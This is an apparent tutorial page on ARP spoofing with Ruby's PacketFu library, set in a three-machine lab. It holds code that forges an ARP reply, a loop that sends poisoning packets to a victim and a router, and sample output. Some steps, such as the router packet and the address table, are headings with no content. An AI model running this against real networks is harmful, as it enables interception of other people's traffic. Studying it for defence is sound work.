ARP Spoofing

    Scenario

    We have 3 machines in this scenario as shown below.

    Here the list of IP and MAC addresses of each of theme in the following table[^1]

    To know our/attacker’s interface information

    returns a hash

    Building victim’s ARP packet

    1. # Build Ethernet header
    2. arp_packet_victim = PacketFu::ARPPacket.new
    3. arp_packet_victim.eth_saddr = "3C:77:E6:68:66:E9"       # our MAC address
    4. arp_packet_victim.eth_daddr = "00:0C:29:38:1D:61"       # the victim's MAC address
    5. # Build ARP Packet
    6. arp_packet_victim.arp_saddr_mac = "3C:77:E6:68:66:E9"   # our MAC address
    7. arp_packet_victim.arp_daddr_mac = "00:0C:29:38:1D:61"   # the victim's MAC address
    8. arp_packet_victim.arp_daddr_ip = "192.168.0.21"         # the victim's IP
    9. arp_packet_victim.arp_opcode = 2                        # arp code 2 == ARP reply

    Building router packet

    Run ARP Spoofing attack

    1. # Send our packet through the wire
    2. while true
    3.     sleep 1
    4.     puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
    5.     arp_packet_victim.to_w(info[:iface])
    6.     puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
    7.     arp_packet_router.to_w(info[:iface])

    Source[^2]

    Returns, time to wiresharking ;)

    1. [+] Sending ARP packet to victim: 192.168.0.21
    2. [+] Sending ARP packet to router: 192.168.0.1
    3. .
    4. .
    5. .
    6. [+] Sending ARP packet to victim: 192.168.0.21
    7. [+] Sending ARP packet to router: 192.168.0.1
    8. [+] Sending ARP packet to victim: 192.168.0.21
    9. [+] Sending ARP packet to router: 192.168.0.1

    [^1]: Create table the easy way -